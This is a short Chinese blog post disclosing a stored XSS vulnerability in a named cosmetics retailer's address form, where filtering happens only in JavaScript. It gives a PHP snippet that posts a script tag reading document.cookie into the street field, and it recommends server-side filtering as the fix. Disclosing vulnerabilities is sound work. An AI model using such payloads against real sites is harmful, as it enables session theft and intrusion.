知我药妆一个存储型XSS漏洞 - 网站安全

知我药妆一个存储型XSS漏洞 - 网站安全 - 自学

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 网站过滤不严个人地址仅仅在js做了过滤，直接csrf构造post包$url=#39;http://www.zhiwo.com/account/ajax/add/address#39;;$ref=#39;http://www.zhiwo.com/account/addresses#39;;$cookies=#39;xxxxxxxxxxx......

网站过滤不严
个人地址仅仅在js做了过滤，直接csrf构造post包

$url='http://www.zhiwo.com/account/ajax/add/address';
$ref='http://www.zhiwo.com/account/addresses';
$cookies='xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';//copy你的cookies
$postfield=array(
    'recipient_name'=>'test',
    'recipient_province'=>'北京市',
    'recipient_city'=>'市辖区',
    'recipient_dist'=>'朝阳区',
    'recipient_street'=>'<script>alert(document.cookie);</script>',
    'recipient_zip'=>'100010',
    'recipient_mobile'=>'13212312345'
);
$postfield = http_build_query($postfield);
$result = curlrequest($url, $postfield,$ref,$cookies);

修复方案：

后台增加过滤即可

作者 taylortai

11对战平台游戏社区持久型XSS - 网站安全 - 自学

快乐购某分站文件包含漏洞 - 网站安全 - 自学

子栏目

知我药妆一个存储型XSS漏洞 - 网站安全 - 自学

最新评论

添加评论

更多文章推荐

添加评论